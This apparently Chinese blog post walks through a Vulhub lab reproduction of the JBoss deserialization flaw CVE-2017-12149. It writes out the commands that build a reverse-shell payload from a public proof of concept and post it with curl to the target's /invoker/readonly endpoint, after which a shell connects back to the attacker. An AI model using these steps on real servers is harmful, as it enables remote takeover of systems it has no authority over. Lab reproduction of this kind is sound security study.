您的位置: 首页  >  文章  >  【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现

【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现

分类: 文章 2025-01-14 21:12:10

环境

目标(Kali):http://192.168.0.11:8080/

操作机(Paroot):192.168.0.131

 

【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现

 

【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现

 

过程

下载POC:https://github.com/joaomatosf/JavaDeserH2HC

【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现

POC使用方法:

攻击机下载执行执行生成二进制payload文件:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
  
 #修改接收shell的主机ip和端口

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.135.100:1234 (IP:端口)

curl向被攻击服务器发送攻击payload:
curl http://192.168.135.4:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

 

【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现

虽然好像有几个警告,但是还是可以使用的。

【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现

操作及开启监听

【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现

向目标发送payload

【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现

成功反弹shell

【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现

 

参考资料

http://www.mianhuage.com/695.html

相关推荐